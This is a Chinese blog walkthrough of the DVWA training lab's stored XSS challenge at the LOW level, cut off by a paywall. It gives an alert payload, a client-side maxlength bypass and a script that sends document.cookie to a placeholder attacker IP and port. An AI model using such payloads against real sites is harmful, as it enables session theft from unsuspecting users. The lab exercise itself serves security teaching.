目录
存储型XSS也叫持久型XSS,从名字就知道特征是攻击代码会被存储在数据库等存储介质中,因此功效持久。攻击者可以把payload放在网站留言板、评论等位置,待用户访问网站并有匹配payload的行为时,即可触发攻击。
存储型XSS和反射型XSS本质都是一样的,只不过反射型XSS的payload的行动路径是:受害者浏览器--服务器--受害者浏览器,而存储型XSS的payload的行动路径是:浏览器--服务器--存储介质--服务器--受害者浏览器。
相关推荐:
DVWA通关--反射型XSS(XSS (Reflected))_箭雨镜屋-优快云博客
pikachu XSS Cross-Site Scripting(皮卡丘漏洞平台通关系列)_箭雨镜屋-优快云博客
WebGoat (A7) Cross Site Scripting (XSS)_箭雨镜屋-优快云博客
LOW
通关步骤
1、试一下最简单的payload:<script>alert(1)</script>
这里我是写在message输入框里面的,name输入框是限制长度的,其实这个长度限制如果仅仅是在html中控制,是可以突破的。
等到第二步的时候来突破一下。

成功弹框

2、尝试突破一下name输入框长度限制
可以在name输入框右键->查看元素(chrome浏览器里面是右键->检查),或者F12打开之后在elements里面自己找找。
可以看到name输入框maxlength是10

直接把maxlength的值改成100

这样就可以绕开输入框长度的html标签属性限制,把payload完整输入进去了

弹出弹框

3、尝试一下获取cookie:
payload:<script>document.write('<img src="http://ip:8899/'+document.cookie+'"/>')</script>
payload里面的ip换成自己的攻击机ip地址,这个ip地址必须是目标机可达的ip地址,并且攻击机上需要起http协议。
简单地起http协议的方法有两种:
(1)用python2:
p

本文深入探讨了存储型XSS的概念、攻击路径和危害,并通过不同难度等级的实例展示了如何利用和防御此类攻击。从LOW到IMPOSSIBLE,逐步解析了payload的构造和源码分析,揭示了XSS过滤机制的漏洞和防范措施。
最低0.47元/天 解锁文章
2782





